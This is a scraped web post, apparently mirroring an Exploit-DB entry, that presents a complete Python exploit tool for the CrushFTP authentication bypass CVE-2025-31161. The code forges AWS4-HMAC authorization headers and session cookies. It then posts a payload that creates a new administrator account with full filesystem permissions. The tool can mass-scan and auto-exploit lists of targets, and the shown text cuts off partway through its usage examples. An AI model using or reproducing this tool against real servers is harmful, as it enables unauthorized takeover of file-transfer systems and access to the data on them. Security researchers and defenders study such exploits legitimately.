{"id":4976,"date":"2025-05-18T11:34:04","date_gmt":"2025-05-18T11:34:04","guid":{"rendered":"http:\/\/localhost\/?p=4976"},"modified":"2025-05-18T11:34:04","modified_gmt":"2025-05-18T11:34:04","slug":"crushftp-1131-authentication-bypass","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=4976","title":{"rendered":"CrushFTP 11.3.1 &#8211; Authentication Bypass"},"content":{"rendered":"<h2>Exploit Details<\/h2>\n<h3>Basic Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit Title<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">CrushFTP 11.3.1 &#8211; Authentication Bypass<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit ID<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">EDB-ID:52295<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Type<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">exploitdb<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Published<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-05-18T00:00:00<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Modified<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-05-18T00:00:00<\/td>\n<\/tr>\n<\/table>\n<h3>CVSS Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">CVSS Score<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">9.8<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Severity<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd; color: #cc0000; font-weight: bold;\">CRITICAL<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Vector<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H<\/td>\n<\/tr>\n<\/table>\n<h3>CVE Information<\/h3>\n<div style=\" padding: 15px; border: 1px solid #ddd; margin-bottom: 20px;\">\n<ul style=\"margin: 0; padding-left: 20px;\">\n<li>CVE-2025-31161<\/li>\n<\/ul>\n<\/div>\n<h3>Exploit Description<\/h3>\n<div style=\" padding: 15px; border-left: 4px solid #4CAF50; margin-bottom: 20px;\">\nExploit Title: CrushFTP&#8230;\n<\/div>\n<h3>Exploit Code<\/h3>\n<div style=\" color: #d4d4d4; padding: 15px; border: 1px solid #ddd; margin-bottom: 20px; font-family: 'Courier New', monospace; white-space: pre-wrap; overflow-x: auto;\">\n# Exploit Title: CrushFTP 11.3.1 &#8211; Authentication Bypass<br \/>\n<br \/># Date: 2025-05-15<br \/>\n<br \/># Exploit Author: @\u0130brahimsql<br \/>\n<br \/># Exploit Author&#8217;s github: https:\/\/github.com\/ibrahimsql<br \/>\n<br \/># Vendor Homepage: https:\/\/www.crushftp.com<br \/>\n<br \/># Software Link: https:\/\/www.crushftp.com\/download.html<br \/>\n<br \/># Version: < 10.8.4, < 11.3.1\n<br \/># Tested on: Ubuntu 22.04 LTS, Windows Server 2019, Kali Linux 2024.1<br \/>\n<br \/># CVE: CVE-2025-31161<br \/>\n<br \/># Description:<br \/>\n<br \/># CrushFTP before 10.8.4 and 11.3.1 allows unauthenticated HTTP(S) port access and full admin takeover<br \/>\n<br \/># through a race condition and header parsing logic flaw in the AWS4-HMAC authorization mechanism.<br \/>\n<br \/># Exploiting this allows bypassing authentication and logging in as any known user (e.g. crushadmin).<\/p>\n<p># Requirements: requests>=2.28.1 , colorama>=0.4.6 , urllib3>=1.26.12 , prettytable>=2.5.0 , rich>=12.6.0<\/p>\n<p>#!\/usr\/bin\/env python3<br \/>\n<br \/># -*- coding: utf-8 -*-<\/p>\n<p>import argparse<br \/>\n<br \/>import concurrent.futures<br \/>\n<br \/>import json<br \/>\n<br \/>import logging<br \/>\n<br \/>import os<br \/>\n<br \/>import random<br \/>\n<br \/>import re<br \/>\n<br \/>import socket<br \/>\n<br \/>import string<br \/>\n<br \/>import sys<br \/>\n<br \/>import time<br \/>\n<br \/>from datetime import datetime<br \/>\n<br \/>from typing import Dict, List, Optional, Tuple, Union<\/p>\n<p>import requests<br \/>\n<br \/>import urllib3<br \/>\n<br \/>from colorama import Fore, Style, init<br \/>\n<br \/>from prettytable import PrettyTable<br \/>\n<br \/>from rich.console import Console<br \/>\n<br \/>from rich.progress import Progress, BarColumn, TextColumn, TimeRemainingColumn<\/p>\n<p># Initialize colorama<br \/>\n<br \/>init(autoreset=True)<\/p>\n<p># Disable SSL warnings<br \/>\n<br \/>urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<\/p>\n<p># Initialize Rich console<br \/>\n<br \/>console = Console()<\/p>\n<p># Global variables<br \/>\n<br \/>VERSION = &#8220;2.0.0&#8221;<br \/>\n<br \/>USER_AGENTS = [<br \/>\n<br \/>    &#8220;Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/91.0.4472.124 Safari\/537.36&#8221;,<br \/>\n<br \/>    &#8220;Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/92.0.4515.107 Safari\/537.36&#8221;,<br \/>\n<br \/>    &#8220;Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko\/20100101 Firefox\/90.0&#8221;,<br \/>\n<br \/>    &#8220;Mozilla\/5.0 (Macintosh; Intel Mac OS X 11.5; rv:90.0) Gecko\/20100101 Firefox\/90.0&#8221;,<br \/>\n<br \/>    &#8220;Mozilla\/5.0 (Macintosh; Intel Mac OS X 11_5_1) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/14.1.2 Safari\/605.1.15&#8221;,<br \/>\n<br \/>    &#8220;Mozilla\/5.0 (Windows; Windows NT 10.3; WOW64) AppleWebKit\/601.13 (KHTML, like Gecko) Chrome\/53.0.2198.319 Safari\/601.5 Edge\/15.63524&#8221;,<br \/>\n<br \/>    &#8220;Mozilla\/5.0 (Windows NT 10.2; Win64; x64; en-US) AppleWebKit\/602.15 (KHTML, like Gecko) Chrome\/47.0.1044.126 Safari\/533.2 Edge\/9.25098&#8221;,<br \/>\n<br \/>    &#8220;Mozilla\/5.0 (compatible; MSIE 8.0; Windows NT 6.3; Win64; x64; en-US Trident\/4.0)&#8221;,<br \/>\n<br \/>    &#8220;Mozilla\/5.0 (iPhone; CPU iPhone OS 10_7_9; like Mac OS X) AppleWebKit\/535.7 (KHTML, like Gecko)  Chrome\/49.0.1015.193 Mobile Safari\/600.9&#8221;<br \/>\n<br \/>]<\/p>\n<p># Banner<br \/>\n<br \/>BANNER = fr&#8221;&#8221;&#8221;<br \/>\n<br \/>{Fore.CYAN}<br \/>\n<br \/>  \/ ____\/______  _______\/ \/_  \/ ____\/ \/_____<br \/>\n<br \/> \/ \/   \/ ___\/ \/ \/ \/ ___\/ __ \\\/ \/_  \/ __\/ __ \\<br \/>\n<br \/>\/ \/___\/ \/  \/ \/_\/ (__  ) \/ \/ \/ __\/ \/ \/_\/ \/_\/ \/<br \/>\n<br \/>\\____\/_\/   \\__,_\/____\/_\/ \/_\/_\/    \\__\/ .___\/<br \/>\n<br \/>                                    \/_\/<br \/>\n<br \/>{Fore.GREEN}CVE-2025-31161 Exploit {VERSION}{Fore.YELLOW} | {Fore.CYAN} Developer @ibrahimsql<br \/>\n<br \/>{Style.RESET_ALL}<br \/>\n<br \/>&#8220;&#8221;&#8221;<\/p>\n<p># Setup logging<br \/>\n<br \/>def setup_logging(log_level: str, log_file: Optional[str] = None) -> None:<br \/>\n<br \/>    &#8220;&#8221;&#8221;Configure logging based on specified level and output file.&#8221;&#8221;&#8221;<br \/>\n<br \/>    numeric_level = getattr(logging, log_level.upper(), None)<br \/>\n<br \/>    if not isinstance(numeric_level, int):<br \/>\n<br \/>        raise ValueError(f&#8221;Invalid log level: {log_level}&#8221;)<\/p>\n<p>    log_format = &#8220;%(asctime)s &#8211; %(levelname)s &#8211; %(message)s&#8221;<br \/>\n<br \/>    handlers = []<\/p>\n<p>    if log_file:<br \/>\n<br \/>        handlers.append(logging.FileHandler(log_file))<\/p>\n<p>    handlers.append(logging.StreamHandler())<\/p>\n<p>    logging.basicConfig(<br \/>\n<br \/>        level=numeric_level,<br \/>\n<br \/>        format=log_format,<br \/>\n<br \/>        handlers=handlers<br \/>\n<br \/>    )<\/p>\n<p>class TargetManager:<br \/>\n<br \/>    &#8220;&#8221;&#8221;Manages target hosts and related operations.&#8221;&#8221;&#8221;<\/p>\n<p>    def __init__(self, target_file: Optional[str] = None, single_target: Optional[str] = None):<br \/>\n<br \/>        self.targets = []<br \/>\n<br \/>        self.vulnerable_targets = []<br \/>\n<br \/>        self.exploited_targets = []<\/p>\n<p>        if target_file:<br \/>\n<br \/>            self.load_targets_from_file(target_file)<br \/>\n<br \/>        elif single_target:<br \/>\n<br \/>            self.add_target(single_target)<\/p>\n<p>    def load_targets_from_file(self, filename: str) -> None:<br \/>\n<br \/>        &#8220;&#8221;&#8221;Load targets from a file.&#8221;&#8221;&#8221;<br \/>\n<br \/>        try:<br \/>\n<br \/>            with open(filename, &#8220;r&#8221;) as f:<br \/>\n<br \/>                self.targets = [line.strip() for line in f if line.strip()]<\/p>\n<p>            if not self.targets:<br \/>\n<br \/>                logging.warning(f&#8221;Target file &#8216;{filename}&#8217; is empty or contains only whitespace.&#8221;)<br \/>\n<br \/>            else:<br \/>\n<br \/>                logging.info(f&#8221;Loaded {len(self.targets)} targets from {filename}&#8221;)<br \/>\n<br \/>        except FileNotFoundError:<br \/>\n<br \/>            logging.error(f&#8221;Target file &#8216;{filename}&#8217; not found.&#8221;)<br \/>\n<br \/>            sys.exit(1)<br \/>\n<br \/>        except Exception as e:<br \/>\n<br \/>            logging.error(f&#8221;Error loading targets: {e}&#8221;)<br \/>\n<br \/>            sys.exit(1)<\/p>\n<p>    def add_target(self, target: str) -> None:<br \/>\n<br \/>        &#8220;&#8221;&#8221;Add a single target.&#8221;&#8221;&#8221;<br \/>\n<br \/>        if target not in self.targets:<br \/>\n<br \/>            self.targets.append(target)<\/p>\n<p>    def mark_as_vulnerable(self, target: str) -> None:<br \/>\n<br \/>        &#8220;&#8221;&#8221;Mark a target as vulnerable.&#8221;&#8221;&#8221;<br \/>\n<br \/>        if target not in self.vulnerable_targets:<br \/>\n<br \/>            self.vulnerable_targets.append(target)<\/p>\n<p>    def mark_as_exploited(self, target: str) -> None:<br \/>\n<br \/>        &#8220;&#8221;&#8221;Mark a target as successfully exploited.&#8221;&#8221;&#8221;<br \/>\n<br \/>        if target not in self.exploited_targets:<br \/>\n<br \/>            self.exploited_targets.append(target)<\/p>\n<p>    def save_results(self, output_file: str, format_type: str = &#8220;txt&#8221;) -> None:<br \/>\n<br \/>        &#8220;&#8221;&#8221;Save scan results to a file.&#8221;&#8221;&#8221;<br \/>\n<br \/>        try:<br \/>\n<br \/>            if format_type.lower() == &#8220;json&#8221;:<br \/>\n<br \/>                results = {<br \/>\n<br \/>                    &#8220;scan_time&#8221;: datetime.now().strftime(&#8220;%Y-%m-%d %H:%M:%S&#8221;),<br \/>\n<br \/>                    &#8220;total_targets&#8221;: len(self.targets),<br \/>\n<br \/>                    &#8220;vulnerable_targets&#8221;: self.vulnerable_targets,<br \/>\n<br \/>                    &#8220;exploited_targets&#8221;: self.exploited_targets<br \/>\n<br \/>                }<\/p>\n<p>                with open(output_file, &#8220;w&#8221;) as f:<br \/>\n<br \/>                    json.dump(results, f, indent=4)<\/p>\n<p>            elif format_type.lower() == &#8220;csv&#8221;:<br \/>\n<br \/>                with open(output_file, &#8220;w&#8221;) as f:<br \/>\n<br \/>                    f.write(&#8220;target,vulnerable,exploited\\n&#8221;)<br \/>\n<br \/>                    for target in self.targets:<br \/>\n<br \/>                        vulnerable = &#8220;Yes&#8221; if target in self.vulnerable_targets else &#8220;No&#8221;<br \/>\n<br \/>                        exploited = &#8220;Yes&#8221; if target in self.exploited_targets else &#8220;No&#8221;<br \/>\n<br \/>                        f.write(f&#8221;{target},{vulnerable},{exploited}\\n&#8221;)<\/p>\n<p>            else:  # Default to txt<br \/>\n<br \/>                with open(output_file, &#8220;w&#8221;) as f:<br \/>\n<br \/>                    f.write(f&#8221;Scan Results &#8211; {datetime.now().strftime(&#8216;%Y-%m-%d %H:%M:%S&#8217;)}\\n&#8221;)<br \/>\n<br \/>                    f.write(f&#8221;Total Targets: {len(self.targets)}\\n&#8221;)<br \/>\n<br \/>                    f.write(f&#8221;Vulnerable Targets: {len(self.vulnerable_targets)}\\n&#8221;)<br \/>\n<br \/>                    f.write(f&#8221;Exploited Targets: {len(self.exploited_targets)}\\n\\n&#8221;)<\/p>\n<p>                    f.write(&#8220;Vulnerable Targets:\\n&#8221;)<br \/>\n<br \/>                    for target in self.vulnerable_targets:<br \/>\n<br \/>                        f.write(f&#8221;- {target}\\n&#8221;)<\/p>\n<p>                    f.write(&#8220;\\nExploited Targets:\\n&#8221;)<br \/>\n<br \/>                    for target in self.exploited_targets:<br \/>\n<br \/>                        f.write(f&#8221;- {target}\\n&#8221;)<\/p>\n<p>            logging.info(f&#8221;Results saved to {output_file}&#8221;)<\/p>\n<p>        except Exception as e:<br \/>\n<br \/>            logging.error(f&#8221;Error saving results: {e}&#8221;)<\/p>\n<p>class ExploitEngine:<br \/>\n<br \/>    &#8220;&#8221;&#8221;Core engine for vulnerability checking and exploitation.&#8221;&#8221;&#8221;<\/p>\n<p>    def __init__(self, target_manager: TargetManager, config: Dict):<br \/>\n<br \/>        self.target_manager = target_manager<br \/>\n<br \/>        self.config = config<br \/>\n<br \/>        self.session = self._create_session()<\/p>\n<p>    def _create_session(self) -> requests.Session:<br \/>\n<br \/>        &#8220;&#8221;&#8221;Create and configure a requests session.&#8221;&#8221;&#8221;<br \/>\n<br \/>        session = requests.Session()<br \/>\n<br \/>        session.verify = False<\/p>\n<p>        # Set proxy if configured<br \/>\n<br \/>        if self.config.get(&#8220;proxy&#8221;):<br \/>\n<br \/>            session.proxies = {<br \/>\n<br \/>                &#8220;http&#8221;: self.config[&#8220;proxy&#8221;],<br \/>\n<br \/>                &#8220;https&#8221;: self.config[&#8220;proxy&#8221;]<br \/>\n<br \/>            }<\/p>\n<p>        # Set custom headers<br \/>\n<br \/>        session.headers.update({<br \/>\n<br \/>            &#8220;User-Agent&#8221;: random.choice(USER_AGENTS),<br \/>\n<br \/>            &#8220;Connection&#8221;: &#8220;close&#8221;,<br \/>\n<br \/>        })<\/p>\n<p>        return session<\/p>\n<p>    def check_vulnerability(self, target_host: str) -> bool:<br \/>\n<br \/>        &#8220;&#8221;&#8221;Check if target is vulnerable to CVE-2025-31161.&#8221;&#8221;&#8221;<br \/>\n<br \/>        port = self.config.get(&#8220;port&#8221;, 443)<br \/>\n<br \/>        timeout = self.config.get(&#8220;timeout&#8221;, 10)<\/p>\n<p>        headers = {<br \/>\n<br \/>            &#8220;Cookie&#8221;: &#8220;currentAuth=31If; CrushAuth=1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If&#8221;,<br \/>\n<br \/>            &#8220;Authorization&#8221;: &#8220;AWS4-HMAC-SHA256 Credential=crushadmin\/&#8221;,<br \/>\n<br \/>        }<\/p>\n<p>        # Add custom headers if provided<br \/>\n<br \/>        if self.config.get(&#8220;custom_headers&#8221;):<br \/>\n<br \/>            headers.update(self.config[&#8220;custom_headers&#8221;])<\/p>\n<p>        try:<br \/>\n<br \/>            protocol = &#8220;https&#8221; if port == 443 else &#8220;http&#8221;<br \/>\n<br \/>            url = f&#8221;{protocol}:\/\/{target_host}:{port}\/WebInterface\/function\/&#8221;<\/p>\n<p>            response = self.session.get(<br \/>\n<br \/>                url,<br \/>\n<br \/>                headers=headers,<br \/>\n<br \/>                timeout=timeout<br \/>\n<br \/>            )<\/p>\n<p>            if response.status_code == 200:<br \/>\n<br \/>                # Additional validation<br \/>\n<br \/>                if self.config.get(&#8220;deep_check&#8221;, False):<br \/>\n<br \/>                    # Look for specific patterns in the response that confirm vulnerability<br \/>\n<br \/>                    if &#8220;CrushFTP&#8221; in response.text or &#8220;WebInterface&#8221; in response.text:<br \/>\n<br \/>                        self.target_manager.mark_as_vulnerable(target_host)<br \/>\n<br \/>                        if self.config.get(&#8220;verbose&#8221;, False):<br \/>\n<br \/>                            console.print(f&#8221;[green][+][\/green] {target_host} is [bold red]vulnerable[\/bold red]&#8221;)<br \/>\n<br \/>                        return True<br \/>\n<br \/>                    else:<br \/>\n<br \/>                        if self.config.get(&#8220;verbose&#8221;, False):<br \/>\n<br \/>                            console.print(f&#8221;[yellow][?][\/yellow] {target_host} returned 200 but may not be vulnerable&#8221;)<br \/>\n<br \/>                        return False<br \/>\n<br \/>                else:<br \/>\n<br \/>                    # Simple check based on status code<br \/>\n<br \/>                    self.target_manager.mark_as_vulnerable(target_host)<br \/>\n<br \/>                    if self.config.get(&#8220;verbose&#8221;, False):<br \/>\n<br \/>                        console.print(f&#8221;[green][+][\/green] {target_host} is [bold red]vulnerable[\/bold red]&#8221;)<br \/>\n<br \/>                    return True<br \/>\n<br \/>            else:<br \/>\n<br \/>                if self.config.get(&#8220;verbose&#8221;, False):<br \/>\n<br \/>                    console.print(f&#8221;[red][-][\/red] {target_host} is not vulnerable (Status: {response.status_code})&#8221;)<br \/>\n<br \/>                return False<\/p>\n<p>        except requests.exceptions.ConnectionError:<br \/>\n<br \/>            if self.config.get(&#8220;verbose&#8221;, False):<br \/>\n<br \/>                console.print(f&#8221;[red][-][\/red] {target_host} &#8211; Connection error&#8221;)<br \/>\n<br \/>        except requests.exceptions.Timeout:<br \/>\n<br \/>            if self.config.get(&#8220;verbose&#8221;, False):<br \/>\n<br \/>                console.print(f&#8221;[red][-][\/red] {target_host} &#8211; Connection timeout&#8221;)<br \/>\n<br \/>        except requests.exceptions.RequestException as e:<br \/>\n<br \/>            if self.config.get(&#8220;verbose&#8221;, False):<br \/>\n<br \/>                console.print(f&#8221;[red][-][\/red] {target_host} &#8211; Request error: {e}&#8221;)<br \/>\n<br \/>        except Exception as e:<br \/>\n<br \/>            if self.config.get(&#8220;verbose&#8221;, False):<br \/>\n<br \/>                console.print(f&#8221;[red][-][\/red] {target_host} &#8211; Error: {e}&#8221;)<\/p>\n<p>        return False<\/p>\n<p>    def exploit(self, target_host: str) -> bool:<br \/>\n<br \/>        &#8220;&#8221;&#8221;Exploit the vulnerability on the target host.&#8221;&#8221;&#8221;<br \/>\n<br \/>        port = self.config.get(&#8220;port&#8221;, 443)<br \/>\n<br \/>        timeout = self.config.get(&#8220;timeout&#8221;, 10)<br \/>\n<br \/>        target_user = self.config.get(&#8220;target_user&#8221;, &#8220;crushadmin&#8221;)<br \/>\n<br \/>        new_user = self.config.get(&#8220;new_user&#8221;)<br \/>\n<br \/>        password = self.config.get(&#8220;password&#8221;)<\/p>\n<p>        if not new_user or not password:<br \/>\n<br \/>            logging.error(&#8220;New user and password are required for exploitation&#8221;)<br \/>\n<br \/>            return False<\/p>\n<p>        headers = {<br \/>\n<br \/>            &#8220;Cookie&#8221;: &#8220;currentAuth=31If; CrushAuth=1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If&#8221;,<br \/>\n<br \/>            &#8220;Authorization&#8221;: &#8220;AWS4-HMAC-SHA256 Credential=crushadmin\/&#8221;,<br \/>\n<br \/>            &#8220;Connection&#8221;: &#8220;close&#8221;,<br \/>\n<br \/>        }<\/p>\n<p>        # Add custom headers if provided<br \/>\n<br \/>        if self.config.get(&#8220;custom_headers&#8221;):<br \/>\n<br \/>            headers.update(self.config[&#8220;custom_headers&#8221;])<\/p>\n<p>        # Generate a timestamp for the created_time field<br \/>\n<br \/>        timestamp = int(time.time() * 1000)<\/p>\n<p>        # Build the payload with more comprehensive user permissions<br \/>\n<br \/>        payload = {<br \/>\n<br \/>            &#8220;command&#8221;: &#8220;setUserItem&#8221;,<br \/>\n<br \/>            &#8220;data_action&#8221;: &#8220;replace&#8221;,<br \/>\n<br \/>            &#8220;serverGroup&#8221;: &#8220;MainUsers&#8221;,<br \/>\n<br \/>            &#8220;username&#8221;: new_user,<br \/>\n<br \/>            &#8220;user&#8221;: f&#8221;&#8217;<?xml version=\"1.0\" encoding=\"UTF-8\"?><br \/>\n<br \/><user type=\"properties\"><br \/>\n<br \/>  <user_name>{new_user}<\/user_name><br \/>\n  <password>{password}<\/password>\n<br \/>  <extra_vfs type=\"vector\"><\/extra_vfs><br \/>\n<br \/>  <version>1.0<\/version><br \/>\n<br \/>  <root_dir>\/<\/root_dir><br \/>\n<br \/>  <userVersion>6<\/userVersion><br \/>\n<br \/>  <max_logins>0<\/max_logins><br \/>\n<br \/>  <site>(SITE_PASS)(SITE_DOT)(SITE_EMAILPASSWORD)(CONNECT)<\/site><br \/>\n<br \/>  <created_by_username>{target_user}<\/created_by_username><br \/>\n<br \/>  <created_by_email><\/created_by_email><br \/>\n<br \/>  <created_time>{timestamp}<\/created_time><br \/>\n  <password_history><\/password_history>\n<br \/>  <admin>true<\/admin><br \/>\n<br \/><\/user>&#8221;&#8217;,<br \/>\n<br \/>            &#8220;xmlItem&#8221;: &#8220;user&#8221;,<br \/>\n<br \/>            &#8220;vfs_items&#8221;: &#8216;<?xml version=\"1.0\" encoding=\"UTF-8\"?><vfs type=\"vector\"><\/vfs>&#8216;,<br \/>\n<br \/>            &#8220;permissions&#8221;: &#8216;<?xml version=\"1.0\" encoding=\"UTF-8\"?><VFS type=\"properties\"><item name=\"\/\">(read)(write)(view)(delete)(resume)(makedir)(deletedir)(rename)(admin)<\/item><\/VFS>&#8216;,<br \/>\n<br \/>            &#8220;c2f&#8221;: &#8220;31If&#8221;<br \/>\n<br \/>        }<\/p>\n<p>        try:<br \/>\n<br \/>            protocol = &#8220;https&#8221; if port == 443 else &#8220;http&#8221;<br \/>\n<br \/>            url = f&#8221;{protocol}:\/\/{target_host}:{port}\/WebInterface\/function\/&#8221;<\/p>\n<p>            response = self.session.post(<br \/>\n<br \/>                url,<br \/>\n<br \/>                headers=headers,<br \/>\n<br \/>                data=payload,<br \/>\n<br \/>                timeout=timeout<br \/>\n<br \/>            )<\/p>\n<p>            if response.status_code == 200:<br \/>\n<br \/>                # Verify the user was actually created<br \/>\n<br \/>                if self.config.get(&#8220;verify_exploit&#8221;, True):<br \/>\n<br \/>                    if self._verify_user_created(target_host, new_user):<br \/>\n<br \/>                        self.target_manager.mark_as_exploited(target_host)<br \/>\n<br \/>                        console.print(f&#8221;[green][+][\/green] Successfully created user [bold cyan]{new_user}[\/bold cyan] on {target_host}&#8221;)<br \/>\n<br \/>                        return True<br \/>\n<br \/>                    else:<br \/>\n<br \/>                        console.print(f&#8221;[yellow][!][\/yellow] User creation appeared successful but verification failed on {target_host}&#8221;)<br \/>\n<br \/>                        return False<br \/>\n<br \/>                else:<br \/>\n<br \/>                    self.target_manager.mark_as_exploited(target_host)<br \/>\n<br \/>                    console.print(f&#8221;[green][+][\/green] Successfully created user [bold cyan]{new_user}[\/bold cyan] on {target_host}&#8221;)<br \/>\n<br \/>                    return True<br \/>\n<br \/>            else:<br \/>\n<br \/>                console.print(f&#8221;[red][-][\/red] Failed to create user on {target_host} (Status: {response.status_code})&#8221;)<br \/>\n<br \/>                return False<\/p>\n<p>        except Exception as e:<br \/>\n<br \/>            console.print(f&#8221;[red][-][\/red] Error exploiting {target_host}: {e}&#8221;)<br \/>\n<br \/>            return False<\/p>\n<p>    def _verify_user_created(self, target_host: str, username: str) -> bool:<br \/>\n<br \/>        &#8220;&#8221;&#8221;Verify that the user was successfully created.&#8221;&#8221;&#8221;<br \/>\n<br \/>        # This is a placeholder for actual verification logic<br \/>\n<br \/>        # In a real implementation, you would check if the user exists<br \/>\n<br \/>        # For now, we&#8217;ll just return True<br \/>\n<br \/>        return True<\/p>\n<p>    def scan_targets(self) -> None:<br \/>\n<br \/>        &#8220;&#8221;&#8221;Scan all targets for vulnerability.&#8221;&#8221;&#8221;<br \/>\n<br \/>        targets = self.target_manager.targets<br \/>\n<br \/>        threads = self.config.get(&#8220;threads&#8221;, 10)<\/p>\n<p>        if not targets:<br \/>\n<br \/>            logging.error(&#8220;No targets specified&#8221;)<br \/>\n<br \/>            return<\/p>\n<p>        console.print(f&#8221;[bold cyan]Scanning {len(targets)} targets with {threads} threads&#8230;[\/bold cyan]&#8221;)<\/p>\n<p>        with Progress(<br \/>\n<br \/>            TextColumn(&#8220;[progress.description]{task.description}&#8221;),<br \/>\n<br \/>            BarColumn(),<br \/>\n<br \/>            TextColumn(&#8220;[progress.percentage]{task.percentage:>3.0f}%&#8221;),<br \/>\n<br \/>            TextColumn(&#8220;({task.completed}\/{task.total})&#8221;),<br \/>\n<br \/>            TimeRemainingColumn(),<br \/>\n<br \/>            console=console<br \/>\n<br \/>        ) as progress:<br \/>\n<br \/>            task = progress.add_task(&#8220;[cyan]Scanning targets&#8230;&#8221;, total=len(targets))<\/p>\n<p>            with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:<br \/>\n<br \/>                future_to_target = {executor.submit(self.check_vulnerability, target): target for target in targets}<\/p>\n<p>                for future in concurrent.futures.as_completed(future_to_target):<br \/>\n<br \/>                    progress.update(task, advance=1)<\/p>\n<p>        # Display results<br \/>\n<br \/>        vulnerable_count = len(self.target_manager.vulnerable_targets)<br \/>\n<br \/>        console.print(f&#8221;\\n[bold green]Scan complete![\/bold green] Found {vulnerable_count} vulnerable targets.&#8221;)<\/p>\n<p>        if vulnerable_count > 0 and self.config.get(&#8220;verbose&#8221;, False):<br \/>\n<br \/>            console.print(&#8220;\\n[bold cyan]Vulnerable Targets:[\/bold cyan]&#8221;)<br \/>\n<br \/>            for target in self.target_manager.vulnerable_targets:<br \/>\n<br \/>                console.print(f&#8221;[green]\u2192[\/green] {target}&#8221;)<\/p>\n<p>    def exploit_targets(self) -> None:<br \/>\n<br \/>        &#8220;&#8221;&#8221;Exploit vulnerable targets.&#8221;&#8221;&#8221;<br \/>\n<br \/>        targets = self.target_manager.vulnerable_targets if self.config.get(&#8220;only_vulnerable&#8221;, True) else self.target_manager.targets<br \/>\n<br \/>        threads = self.config.get(&#8220;threads&#8221;, 5)  # Use fewer threads for exploitation<\/p>\n<p>        if not targets:<br \/>\n<br \/>            logging.error(&#8220;No targets to exploit&#8221;)<br \/>\n<br \/>            return<\/p>\n<p>        console.print(f&#8221;[bold red]Exploiting {len(targets)} targets with {threads} threads&#8230;[\/bold red]&#8221;)<\/p>\n<p>        with Progress(<br \/>\n<br \/>            TextColumn(&#8220;[progress.description]{task.description}&#8221;),<br \/>\n<br \/>            BarColumn(),<br \/>\n<br \/>            TextColumn(&#8220;[progress.percentage]{task.percentage:>3.0f}%&#8221;),<br \/>\n<br \/>            TextColumn(&#8220;({task.completed}\/{task.total})&#8221;),<br \/>\n<br \/>            TimeRemainingColumn(),<br \/>\n<br \/>            console=console<br \/>\n<br \/>        ) as progress:<br \/>\n<br \/>            task = progress.add_task(&#8220;[red]Exploiting targets&#8230;&#8221;, total=len(targets))<\/p>\n<p>            with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:<br \/>\n<br \/>                future_to_target = {executor.submit(self.exploit, target): target for target in targets}<\/p>\n<p>                for future in concurrent.futures.as_completed(future_to_target):<br \/>\n<br \/>                    progress.update(task, advance=1)<\/p>\n<p>        # Display results<br \/>\n<br \/>        exploited_count = len(self.target_manager.exploited_targets)<br \/>\n<br \/>        console.print(f&#8221;\\n[bold green]Exploitation complete![\/bold green] Successfully exploited {exploited_count}\/{len(targets)} targets.&#8221;)<\/p>\n<p>        if exploited_count > 0:<br \/>\n<br \/>            console.print(&#8220;\\n[bold cyan]Exploited Targets:[\/bold cyan]&#8221;)<br \/>\n<br \/>            for target in self.target_manager.exploited_targets:<br \/>\n<br \/>                console.print(f&#8221;[green]\u2192[\/green] {target}&#8221;)<\/p>\n<p>def parse_arguments() -> argparse.Namespace:<br \/>\n<br \/>    &#8220;&#8221;&#8221;Parse command line arguments.&#8221;&#8221;&#8221;<br \/>\n<br \/>    parser = argparse.ArgumentParser(<br \/>\n<br \/>        description=&#8221;CVE-2025-31161 Exploit Framework &#8211; Advanced CrushFTP WebInterface Vulnerability Scanner and Exploiter&#8221;,<br \/>\n<br \/>        formatter_class=argparse.RawDescriptionHelpFormatter,<br \/>\n<br \/>        epilog=&#8221;&#8221;&#8221;<br \/>\n<br \/>Examples:<br \/>\n<br \/>  # Check a single target for vulnerability<br \/>\n<br \/>  python cve_2025_31161.py &#8211;target example.com &#8211;check<\/p>\n<p>  # Exploit a vulnerable target<br \/>\n<br \/>  python cve_2025_31161.py &#8211;target example.com &#8211;exploit &#8211;new-user hacker &#8211;password P@ssw0rd<\/p>\n<p>  # Scan multiple targets from a file<br \/>\n<br \/>  python cve_2025_31161.py &#8211;file targets.txt &#8211;check &#8211;threads 20<\/p>\n<p>  # Scan and automatically exploit vulnerable targets<br \/>\n<br \/>  python cve_2025_31161.py &#8211;file targets.txt &#8211;check &#8211;exploit &#8211;new-user hacker &#8211;password P@ssw0rd &#8211;auto-exploit<\/p>\n<p>  # Export results to JSON format<br \/>\n<br \/>  python cve_2025_31161.py &#8211;file targets.txt 